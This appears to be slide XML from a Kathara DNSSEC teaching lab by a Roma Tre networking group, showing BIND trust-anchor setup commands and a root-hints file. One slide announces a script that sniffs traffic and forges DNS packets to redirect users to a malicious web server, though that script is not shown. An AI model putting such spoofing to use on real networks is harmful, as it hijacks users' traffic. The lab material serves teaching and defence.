          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>we will learn how to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>iptables command to block traffic for DNS resolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script to sniff traffic and create fake packet to redirect traffic to malicious web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E5D5B4C-22D0-0B2C-A0A5-2C20457B7E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E58F9C-BA66-9FD2-348D-D8125AD8D638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97078D1C-067C-00DB-925C-5BF925961B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9332918" y="5"/>
            <a:ext cx="1716087" cy="333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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre</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C7A52B-67BE-C858-6036-08EB5A316992}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B74DB8DD-6147-B952-E361-9B4636C7815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D9E26D-6247-F080-2B7F-54CC2D4C13D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D785998B-BB57-44F8-E4EE-7BCCC8CD6263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5958C4F-AFD1-3E60-21E7-2D8261A3C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="354370" y="1259628"/>
            <a:ext cx="11483260" cy="2167083"/>
            <a:chOff x="2372" y="3332"/>
            <a:chExt cx="3786" cy="309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280F59B3-A3E6-5820-DB42-9C948F0256DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2372" y="3361"/>
              <a:ext cx="3786" cy="280"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo "trust-anchors { \".\" static-key $F $P $A \"$K\"; };" &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> flush</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo "DNSSEC Trust Anchor configured with correct syntax!"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{198881A9-6D97-8DD7-1901-0AEFA866A5EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3332"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFFB480A-4957-2089-F61F-111763798536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="354370" y="4104899"/>
            <a:ext cx="6129330" cy="1737999"/>
            <a:chOff x="126" y="2522"/>
            <a:chExt cx="2676" cy="648"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4C5851-76D5-D75F-9875-1712AEC89D56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="2594"/>
              <a:ext cx="2676" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.      IN  A     100.0.75.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715E9742-DDA4-FED5-31EE-7806E559B416}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="173" y="2522"/>
              <a:ext cx="1175" cy="145"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\bind\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C879D3F-9D20-A4CD-ED3D-7961D5F13C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="3306576"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20186"/>
              <a:gd name="adj2" fmla="val -237792"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>writes the trust anchor to the trusted-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D6C812-EE8B-69F9-5B81-5DF717D055FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284388" y="3489537"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8337"/>
              <a:gd name="adj2" fmla="val -235957"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ensures that BIND can read the newly created file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278187061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C64464-D1D5-388A-EFF1-88CB9867EF41}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C03D28-0B51-EAB1-594E-F092F1015555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
